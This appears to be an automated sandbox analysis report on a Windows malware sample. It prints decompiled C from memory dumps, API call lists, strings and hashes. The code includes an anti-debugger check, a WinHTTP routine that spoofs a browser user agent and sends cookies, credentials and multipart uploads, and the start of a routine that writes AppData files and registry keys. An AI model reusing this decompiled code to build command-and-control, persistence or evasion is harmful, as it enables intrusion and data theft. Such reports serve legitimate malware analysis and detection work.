				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}

0x1001a1d9
0x1001a1ee
0x1001a1f4
0x1001a201
0x1001a209
0x1001a209
0x1001a216
0x1001a225

APIs

FindFirstFileA.KERNELBASE(1001A6D9,?), ref: 1001A1EE
FindClose.KERNELBASE(000000FF), ref: 1001A216

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
Instruction ID: d31bde6dcc0951e355ad99ae7a1c5ee3f3ec40d99bb51e99ff820f39f399f313
Opcode Fuzzy Hash: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
Instruction Fuzzy Hash: 65F0A57590022C9BDB70DF64DD88BDDB7B8AB08310F1002D4E91DA32A0DB30AAD58F51

Uniqueness

Uniqueness Score: -1.00%

Function 1001A050, Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1001A050(void* __ecx) {
				char _v8;

				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx); // executed
				return _v8;
			}

0x1001a05f
0x1001a06b

APIs

GetCurrentProcess.KERNEL32(00000001,?,?,1001A092,?,?,1001A120), ref: 1001A058
CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,1001A092,?,?,1001A120), ref: 1001A05F

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CheckCurrentDebuggerPresentProcessRemote
String ID:
API String ID: 3244773808-0
Opcode ID: 71cd54979e637eef40f12cd3ff344a400265874cd4a543beada5d783fbf83a72
Instruction ID: 7aa664103940c8ed1930ed56626e242170840db10b01f7fadc3ab8fab0425f62
Opcode Fuzzy Hash: 71cd54979e637eef40f12cd3ff344a400265874cd4a543beada5d783fbf83a72
Instruction Fuzzy Hash: CAC0127680020CA7CB00DBE0CD88889777CD6041117110181FA09C3200D9319A444654

Uniqueness

Uniqueness Score: -1.00%

Function 00403E2C, Relevance: 3.0, Strings: 2, Instructions: 463COMMON

Download Yara Rule

Strings

, xrefs: 00403E77
x, xrefs: 00403E7C

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $x
API String ID: 0-1748666202
Opcode ID: f5cc0574985620e3343da4c48bb101a148d105addfda8af8ae245c1a31650d8a
Instruction ID: 88269a3bc221323b95d1108938db4348613c57035d982a3d8bb6baa5cddbe632
Opcode Fuzzy Hash: f5cc0574985620e3343da4c48bb101a148d105addfda8af8ae245c1a31650d8a
Instruction Fuzzy Hash: 3AD10776B04644DFEB11CFE8C5C07AA7BA1EB8A764F34007BEA02E3751C67A9D01D645

Uniqueness

Uniqueness Score: -1.00%

Function 10021C30, Relevance: 100.4, APIs: 42, Strings: 15, Instructions: 641
timeCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E10021C30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, signed int _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v40;
				long _v44;
				WCHAR* _v48;
				long _v52;
				short _v54;
				short _v58;
				short _v62;
				short _v66;
				short _v70;
				char _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				long _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _v140;
				char _v28334;
				char _v28336;
				intOrPtr _v28340;
				intOrPtr _v28344;
				char _v28862;
				short _v28864;
				long _v28868;
				long _v28872;
				long _v28876;
				intOrPtr _v28880;
				intOrPtr _v28884;
				char _v28912;
				char _v28940;
				long _v28944;
				intOrPtr _v28948;
				intOrPtr _v28952;
				intOrPtr _v28956;
				long _v28960;
				intOrPtr _v28964;
				intOrPtr _v28968;
				intOrPtr _v28972;
				intOrPtr _v28976;
				void* __ebp;
				long _t263;
				intOrPtr _t267;
				long _t268;
				signed int* _t276;
				long _t277;
				long _t279;
				long _t288;
				long _t292;
				long _t295;
				long _t298;
				long _t311;
				intOrPtr _t330;
				intOrPtr _t470;
				void* _t471;
				void* _t473;
				void* _t479;

				_t469 = __esi;
				_t468 = __edi;
				_t357 = __ebx;
				_push(0xffffffff);
				_push(E10023295);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t470;
				E10018B00(0x7120);
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				_v28 = 0;
				_v20 = 0x50;
				_v40 = 0;
				_t263 = E100212F0(__ebx, __edi, __esi, _a16,  &_v24,  &_v36,  &_v28,  &_v20,  &_v40);
				_t471 = _t470 + 0x18;
				_v32 = _t263;
				if(_v32 == 0) {
					L66:
					 *[fs:0x0] = _v16;
					return _v32;
				} else {
					_v32 = 0;
					_v48 = "----WebKitFormBoundaryovEAlxca0DiIz7tl";
					_v76 = E1001A3D0(__ebx, __edi, __esi, _v28);
					_t267 = E1001A3D0(__ebx, __edi, __esi, _v40);
					_t473 = _t471 + 8;
					_v84 = _t267;
					_v72 = 0;
					_v70 = 0;
					_v66 = 0;
					_v62 = 0;
					_v58 = 0;
					_v54 = 0;
					_t268 = _a20;
					_v28944 = _t268;
					if(_v28944 == 1) {
						_t268 = E1000E7A3(0,  &_v72, 0xa, L"GET");
						_t473 = _t473 + 0xc;
					} else {
						if(_v28944 > 1) {
							if(_v28944 <= 3) {
								_t268 = E1000E7A3( &_v72,  &_v72, 0xa, L"POST");
								_t473 = _t473 + 0xc;
							}
						}
					}
					_v88 = 0;
					_v44 = 0;
					_v80 = 0;
					_v52 = 0;
					__imp__WinHttpOpen(L"A WinHTTP Example Program/1.0", 0, 0, 0, 0); // executed
					_v44 = _t268;
					if(_v44 == 0) {
						L59:
						__eflags = _v52;
						if(_v52 != 0) {
							__imp__WinHttpCloseHandle(_v52);
						}
						__eflags = _v80;
						if(_v80 != 0) {
							__imp__WinHttpCloseHandle(_v80);
						}
						__eflags = _v44;
						if(__eflags != 0) {
							__imp__WinHttpCloseHandle(_v44); // executed
						}
						_push(_v84);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v76);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v36);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v28);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v40);
						E1000CA40(_t357, _t468, _t469, __eflags);
						goto L66;
					}
					_t504 = _a4;
					if(_a4 != 0) {
						_v100 = E1001A3D0(_t357, _t468, _t469, _a4);
						_v112 = 3;
						_v108 = _v100;
						_v104 = 0x10025f9c;
						__imp__WinHttpSetOption(_v44, 0x26,  &_v112, 0xc);
						_push(_v100);
						E1000CA40(_t357, _t468, _t469, _t504);
						_t473 = _t473 + 8;
					}
					asm("sbb edx, edx");
					_v92 =  ~_a24 & 0x00000002;
					_t276 =  &_v92;
					__imp__WinHttpSetOption(_v44, 0x58, _t276, 4);
					_v96 = _t276;
					_t277 = _v76;
					__imp__WinHttpConnect(_v44, _t277, _v20, 0);
					_v80 = _t277;
					if(_v80 == 0) {
						goto L59;
					}
					_v116 = 0x100;
					if(_v24 != 0) {
						_v116 = _v116 | 0x00800000;
					}
					_t279 = _v80;
					__imp__WinHttpOpenRequest(_t279,  &_v72, _v84, L"HTTP/1.1", 0, 0, _v116); // executed
					_v52 = _t279;
					if(_v52 == 0) {
						goto L59;
					} else {
						if(_a8 != 0) {
							_t510 = _a12;
							if(_a12 != 0) {
								_v132 = E1001A3D0(_t357, _t468, _t469, _a8);
								_v136 = E1001A3D0(_t357, _t468, _t469, _a12);
								__imp__WinHttpSetCredentials(_v52, 1, 1, _v132, _v136, 0);
								_push(_v132);
								E1000CA40(_t357, _t468, _t469, _t510);
								_push(_v136);
								E1000CA40(_t357, _t468, _t469, _t510);
								_t473 = _t473 + 0x10;
							}
						}
						_v120 = 4;
						__imp__WinHttpQueryOption(_v52, 0x1f,  &_v116,  &_v120);
						_v116 = _v116 | 0x00000100;
						_v116 = _v116 | 0x00002000;
						_v116 = _v116 | 0x00001000;
						__imp__WinHttpSetOption(_v52, 0x1f,  &_v116, 4);
						__imp__WinHttpAddRequestHeaders(_v52, L"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"upgrade-insecure-requests: 1", 0xffffffff, 0xa0000000);
						if(_a60 == 0) {
							L22:
							__eflags = _a28;
							if(_a28 != 0) {
								_v28340 = E1001A3D0(_t357, _t468, _t469, _a28);
								_v28336 = 0;
								E1000CF80(_t468,  &_v28334, 0, 0x6e1e);
								E1000E7A3( &_v28336,  &_v28336, 0x3710, L"Cookie: ");
								E1000E729( &_v28336, 0x3710, _v28340);
								__imp__WinHttpAddRequestHeaders(_v52,  &_v28336, 0xffffffff, 0xa0000000);
								_push(_v28340);
								E1000CA40(_t357, _t468, _t469, __eflags);
								_t473 = _t473 + 0x2c;
							}
							_v28948 = _a20;
							__eflags = _v28948 - 2;
							if(_v28948 == 2) {
								__imp__WinHttpAddRequestHeaders(_v52, L"Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
							} else {
								__eflags = _v28948 - 3;
								if(_v28948 == 3) {
									_v28864 = 0;
									E1000CF80(_t468,  &_v28862, 0, 0x206);
									_v28344 = E1001A3D0(_t357, _t468, _t469, _v48);
									wsprintfW( &_v28864, L"Content-Type: multipart/form-data; boundary=%ws", _v28344);
									__imp__WinHttpAddRequestHeaders(_v52,  &_v28864, 0xffffffff, 0xa0000000);
									_push(_v28344);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x20;
								}
							}
							__imp__WinHttpSetTimeouts(_v52, 0xc350, 0xc350, 0xc350, 0xc350);
							_v128 = 0;
							_v124 = 0;
							__eflags = _a20 - 3;
							if(_a20 == 3) {
								_v124 = E100215A0(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_v128 = L1000CEAF(_t357, _v48, _t468, _t469, _v124);
								E1000CF80(_t468, _v128, 0, _v124);
								_t330 = E100215A0(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_t473 = _t473 + 0x58;
								_v124 = _t330;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28952 = _a36;
							} else {
								_v28952 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28956 = _a36;
							} else {
								_v28956 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28960 = _a32;
							} else {
								_v28960 = _v128;
							}
							_t288 = _v52;
							__imp__WinHttpSendRequest(_t288, 0, 0, _v28960, _v28956, _v28952, 0); // executed
							_v88 = _t288;
							__eflags = _v88;
							if(_v88 == 0) {
								L57:
								__eflags = _v128;
								if(__eflags != 0) {
									_push(_v128);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 4;
								}
								goto L59;
							} else {
								__imp__WinHttpReceiveResponse(_v52, 0);
								_v88 = _t288;
								__eflags = _v88;
								if(_v88 == 0) {
									goto L57;
								}
								_v28868 = 0;
								__imp__WinHttpQueryHeaders(_v52, 0x16, 0, 0,  &_v28868, 0);
								_t292 = GetLastError();
								__eflags = _t292 - 0x7a;
								if(_t292 == 0x7a) {
									_v28884 = L1000CEAF(_t357,  &_v28868, _t468, _t469, _v28868 + 2);
									__eflags = _v28868 + 2;
									E1000CF80(_t468, _v28884, 0, _v28868 + 2);
									_t311 = _v52;
									__imp__WinHttpQueryHeaders(_t311, 0x16, 0, _v28884,  &_v28868, 0);
									_v88 = _t311;
									_v28880 = E1001A460(_t357, _t468, _t469, _v28884);
									_v28964 = E10001160( &_v28912, __eflags, _v28880);
									_v28968 = _v28964;
									_v8 = 0;
									E10001A90(_a64, _v28968);
									_v8 = 0xffffffff;
									E100011A0( &_v28912);
									_push(_v28880);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_push(_v28884);
									_t292 = E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x1c;
								}
								_v28876 = 0;
								_v28872 = 0;
								__eflags = _v88;
								if(_v88 == 0) {
									L56:
									_v32 = _v88;
									goto L57;
								} else {
									while(1) {
										_v28868 = 0;
										_t437 = _v52;
										__imp__WinHttpQueryDataAvailable(_v52,  &_v28868);
										__eflags = _t292;
										if(__eflags == 0) {
											break;
										}
										__eflags = _v28868;
										if(_v28868 != 0) {
											_t295 = L1000CEAF(_t357, _t437, _t468, _t469, _v28868 + 1);
											_t479 = _t473 + 4;
											_v28876 = _t295;
											__eflags = _v28876;
											if(__eflags != 0) {
												E1000CF80(_t468, _v28876, 0, _v28868 + 1);
												_t473 = _t479 + 0xc;
												_t439 = _v28876;
												_t298 = _v52;
												__imp__WinHttpReadData(_t298, _v28876, _v28868,  &_v28872);
												__eflags = _t298;
												if(__eflags == 0) {
													_push(GetLastError());
													_push("WinHttpQueryDataAvailable failed. Error = %d\n");
													E1000E664(_t357, _t439, _t468, _t469, __eflags);
													_t473 = _t473 + 8;
												}
												__eflags = _v28872;
												if(__eflags != 0) {
													_v28972 = E10001160( &_v28940, __eflags, _v28876);
													_v28976 = _v28972;
													_v8 = 1;
													E10001A90(_a68, _v28976);
													_v8 = 0xffffffff;
													E100011A0( &_v28940);
													_push(_v28876);
													_t292 = E1000CA40(_t357, _t468, _t469, __eflags);
													_t473 = _t473 + 4;
													__eflags = _v28868;
													if(_v28868 > 0) {
														continue;
													}
												} else {
												}
												goto L56;
											}
											_push("Out of memory.\n");
											E1000E664(_t357, _t437, _t468, _t469, __eflags);
											_t473 = _t479 + 4;
											goto L56;
										}
										goto L56;
									}
									_push(GetLastError());
									_push("WinHttpQueryDataAvailable failed. Error = %d\n");
									E1000E664(_t357, _t437, _t468, _t469, __eflags);
									_t473 = _t473 + 8;
									goto L56;
								}
							}
						} else {
							_v140 = 0;
							while( *((intOrPtr*)(_a60 + _v140 * 4)) != 0) {
								__imp__WinHttpAddRequestHeaders(_v52,  *((intOrPtr*)(_a60 + _v140 * 4)), 0xffffffff, 0xa0000000);
								_v140 = _v140 + 1;
							}
							goto L22;
						}
					}
				}
			}

0x10021c30
0x10021c30
0x10021c30
0x10021c33
0x10021c35
0x10021c40
0x10021c41
0x10021c4d
0x10021c52
0x10021c59
0x10021c60
0x10021c67
0x10021c6e
0x10021c75
0x10021c94
0x10021c99
0x10021c9c
0x10021ca3
0x10022513
0x10022519
0x10022523
0x10021ca9
0x10021ca9
0x10021cb0
0x10021cc3
0x10021cca
0x10021ccf
0x10021cd2
0x10021cd5
0x10021cdd
0x10021ce0
0x10021ce3
0x10021ce6
0x10021ce9
0x10021ced
0x10021cf0
0x10021cfd
0x10021d1e
0x10021d23
0x10021cff
0x10021d06
0x10021d0f
0x10021d33
0x10021d38
0x10021d38
0x10021d0f
0x10021d06
0x10021d3b
0x10021d42
0x10021d49
0x10021d50
0x10021d64
0x10021d6a
0x10021d71
0x100224a7
0x100224a7
0x100224ab
0x100224b1
0x100224b1
0x100224b7
0x100224bb
0x100224c1
0x100224c1
0x100224c7
0x100224cb
0x100224d1
0x100224d1
0x100224da
0x100224db
0x100224e6
0x100224e7
0x100224f2
0x100224f3
0x100224fe
0x100224ff
0x1002250a
0x1002250b
0x00000000
0x10022510
0x10021d77
0x10021d7b
0x10021d89
0x10021d8c
0x10021d96
0x10021d99
0x10021dac
0x10021db5
0x10021db6
0x10021dbb
0x10021dbb
0x10021dc3
0x10021dc8
0x10021dcd
0x10021dd7
0x10021ddd
0x10021de7
0x10021def
0x10021df5
0x10021dfc
0x00000000
0x00000000
0x10021e02
0x10021e0d
0x10021e18
0x10021e18
0x10021e30
0x10021e34
0x10021e3a
0x10021e41
0x00000000
0x10021e47
0x10021e4b
0x10021e4d
0x10021e51
0x10021e5f
0x10021e6e
0x10021e89
0x10021e92
0x10021e93
0x10021ea1
0x10021ea2
0x10021ea7
0x10021ea7
0x10021e51
0x10021eaa
0x10021ebf
0x10021ece
0x10021ed9
0x10021ee5
0x10021ef4
0x10021f0a
0x10021f20
0x10021f36
0x10021f4c
0x10021f56
0x10021fa2
0x10021fa2
0x10021fa6
0x10021fb8
0x10021fbe
0x10021fd5
0x10021fee
0x10022009
0x10022023
0x1002202f
0x10022030
0x10022035
0x10022035
0x1002203b
0x10022041
0x10022048
0x10022068
0x1002204a
0x1002204a
0x10022051
0x10022070
0x10022087
0x1002209b
0x100220b4
0x100220cf
0x100220db
0x100220dc
0x100220e1
0x100220e1
0x10022051
0x100220fc
0x10022102
0x10022109
0x10022110
0x10022114
0x10022142
0x10022151
0x1002215e
0x1002218a
0x1002218f
0x10022192
0x10022192
0x10022195
0x10022199
0x100221a9
0x1002219b
0x1002219e
0x1002219e
0x100221af
0x100221b3
0x100221c3
0x100221b5
0x100221b8
0x100221b8
0x100221c9
0x100221cd
0x100221dd
0x100221cf
0x100221d2
0x100221d2
0x100221fe
0x10022202
0x10022208
0x1002220b
0x1002220f
0x10022495
0x10022495
0x10022499
0x1002249e
0x1002249f
0x100224a4
0x100224a4
0x00000000
0x10022215
0x1002221b
0x10022221
0x10022224
0x10022228
0x00000000
0x00000000
0x1002222e
0x1002224b
0x10022251
0x10022257
0x1002225a
0x10022272
0x1002227e
0x1002228b
0x100222a7
0x100222ab
0x100222b1
0x100222c3
0x100222db
0x100222e7
0x100222ed
0x100222fe
0x10022303
0x10022310
0x1002231b
0x1002231c
0x1002232a
0x1002232b
0x10022330
0x10022330
0x10022333
0x1002233d
0x10022347
0x1002234b
0x1002248f
0x10022492
0x00000000
0x10022351
0x10022351
0x10022351
0x10022362
0x10022366
0x1002236c
0x1002236e
0x00000000
0x00000000
0x10022389
0x10022390
0x100223a1
0x100223a6
0x100223a9
0x100223af
0x100223b6
0x100223dd
0x100223e2
0x100223f3
0x100223fa
0x100223fe
0x10022404
0x10022406
0x1002240e
0x1002240f
0x10022414
0x10022419
0x10022419
0x1002241c
0x10022423
0x10022439
0x10022445
0x1002244b
0x1002245c
0x10022461
0x1002246e
0x10022479
0x1002247a
0x1002247f
0x10022482
0x10022489
0x00000000
0x00000000
0x00000000
0x10022425
0x00000000
0x10022423
0x100223b8
0x100223bd
0x100223c2
0x00000000
0x100223c2
0x00000000
0x10022392
0x10022376
0x10022377
0x1002237c
0x10022381
0x00000000
0x10022381
0x1002234b
0x10021f58
0x10021f58
0x10021f73
0x10021f9a
0x10021f6d
0x10021f6d
0x00000000
0x10021f73
0x10021f56
0x10021e41

APIs

Part of subcall function 100212F0: _memset.LIBCMT ref: 1002140B
Part of subcall function 100212F0: _strlen.LIBCMT ref: 1002144A

Part of subcall function 1001A3D0: _strlen.LIBCMT ref: 1001A3E1
Part of subcall function 1001A3D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
Part of subcall function 1001A3D0: _memset.LIBCMT ref: 1001A426
Part of subcall function 1001A3D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442

_wcscpy_s.LIBCMT ref: 10021D1E
_wcscpy_s.LIBCMT ref: 10021D33
WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021DD7
WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021DEF
WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021E34
WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021E89
WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021EBF
WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021EF4
WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021F0A
WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021F20
WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021F36
WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021F4C
WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021F9A
_memset.LIBCMT ref: 10021FD5
_wcscpy_s.LIBCMT ref: 10021FEE
_wcscat_s.LIBCMT ref: 10022009
WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10022023
WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10022068

Part of subcall function 100215A0: _memset.LIBCMT ref: 10021636
Part of subcall function 100215A0: _memset.LIBCMT ref: 10021653
Part of subcall function 100215A0: _memset.LIBCMT ref: 10021670
Part of subcall function 100215A0: _sprintf.LIBCMT ref: 10021692
Part of subcall function 100215A0: _sprintf.LIBCMT ref: 100216AC
Part of subcall function 100215A0: _sprintf.LIBCMT ref: 100216D8
Part of subcall function 100215A0: _strlen.LIBCMT ref: 100216EF
Part of subcall function 100215A0: _strlen.LIBCMT ref: 10021717

WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 100220FC
_memset.LIBCMT ref: 1002215E
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 10022202
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 1002221B
WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 1002224B
GetLastError.KERNEL32 ref: 10022251
_memset.LIBCMT ref: 1002228B
WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 100222AB
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022366
GetLastError.KERNEL32 ref: 10022370
_printf.LIBCMT ref: 1002237C
WinHttpCloseHandle.WINHTTP(00000000), ref: 100224B1
WinHttpCloseHandle.WINHTTP(00000000), ref: 100224C1
WinHttpCloseHandle.WINHTTP(00000000), ref: 100224D1

Strings

upgrade-insecure-requests: 1, xrefs: 10021F43
A WinHTTP Example Program/1.0, xrefs: 10021D5F
WinHttpQueryDataAvailable failed. Error = %d, xrefs: 1002240F
Content-Type: multipart/form-data; boundary=%ws, xrefs: 100220A8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021F01
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021F2D
Content-Type: application/x-www-form-urlencoded, xrefs: 1002205F
Cookie: , xrefs: 10021FDD
WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022377
P, xrefs: 10021C6E
GET, xrefs: 10021D13
HTTP/1.1, xrefs: 10021E23
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021F17
POST, xrefs: 10021D28
Out of memory., xrefs: 100223B8

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Http$HeadersRequest$_memset$OptionQuery_strlen$CloseHandle_sprintf_wcscpy_s$ByteCharErrorLastMultiOpenWide$AvailableConnectCredentialsDataReceiveResponseSendTimeouts_printf_wcscat_s
String ID: A WinHTTP Example Program/1.0$Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=%ws$Cookie: $GET$HTTP/1.1$Out of memory.$P$POST$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d$WinHttpQueryDataAvailable failed. Error = %d$upgrade-insecure-requests: 1
API String ID: 2394362766-3430901228
Opcode ID: 8ea9e4dbf02062ba1a9f6b707a678d511401b05b778d796b30c9c46de9909fc9
Instruction ID: 6be37eb72d5cb71702d10a25316398720e60b36711b4d3b8ebfd4143576bc246
Opcode Fuzzy Hash: 8ea9e4dbf02062ba1a9f6b707a678d511401b05b778d796b30c9c46de9909fc9
Instruction Fuzzy Hash: D14227B5D00218EBEB24DFA4DC85FDEB7B5EB48304F508258F609A7281D779AA84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1001FA90, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001FA90(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t57;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
				E1000CDB3( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF80(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CDB3( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF80(_t77,  &_v267, 0, 0x103);
				E1001F9F0(__ebx, _t77, __esi, _t94,  &_v268); // executed
				_t44 = E1001F6E0(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F6E0(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F650( &_v532, _t96,  &_v532, _a4, _a8); // executed
